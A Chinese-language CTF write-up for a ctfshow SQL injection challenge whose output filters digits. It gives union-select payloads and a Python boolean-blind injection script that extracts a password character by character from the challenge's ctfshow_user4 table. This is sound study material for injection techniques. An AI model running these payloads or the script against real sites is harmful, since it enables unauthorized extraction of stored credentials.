1. 这里返回逻辑把flag数字都过滤了,那么编码的方法肯定不能用了,利用布尔盲注吧,先简单测一下
    ```shell

    看看有几列

    1’ order by 2—+

看看回显位,因为过滤了数字,肯定不能用数字进行回显了

-1’ union select ‘a’,’b’—+

爆数据库名字

-1’ union select database(),’b’—+

根据经验,表肯定是ctfshow_user4,这里因为有数字,肯定会被过滤,构造布尔盲注测试一下

-1’ union select if(ascii(substr((select database()),0,1))>97,’yes’,’no’),’b’—+

  2. 2.  这里写个脚本来跑  
  3. ```python
  4. # -*- coding: utf-8 -*-
  5. '''
  6. @Time : 2021/7/23 11:07
  7. @Author : Seals6
  8. @File : web164.py
  9. @contact: 972480239@qq.com
  10. @blog: seals6.github.io
  12. -*- 功能说明 -*-
  14. -*- 更新说明 -*-
  16. '''
  17. import requests
  18. url="http://5272c169-2883-4fca-8822-f7dd6daa672f.challenge.ctf.show:8080/api/v4.php"
  19. i=0
  20. flag=""
  22. while True:
  23.     i+=1
  24.     max=128
  25.     min=30
  27.     while min<max:
  28.         mid = (max + min) // 2
  29.         payload="-1' union select 'a',if(ascii(substr((select group_concat(password) from ctfshow_user4 where username='flag'),%d,1))>%d,'yes','no') -- "%(i,mid)
  30.         params = {"id": payload}
  31.         r=requests.get(url=url,params=params)
  32.         # print(r.url)
  33.         if "yes" in r.text:
  34.             # print(r.text)
  35.             min=mid+1
  36.         else:
  37.             max=mid
  38.     if min != 30:
  39.         flag+=chr(min)
  40.     else:
  41.         break
  42.     print(flag)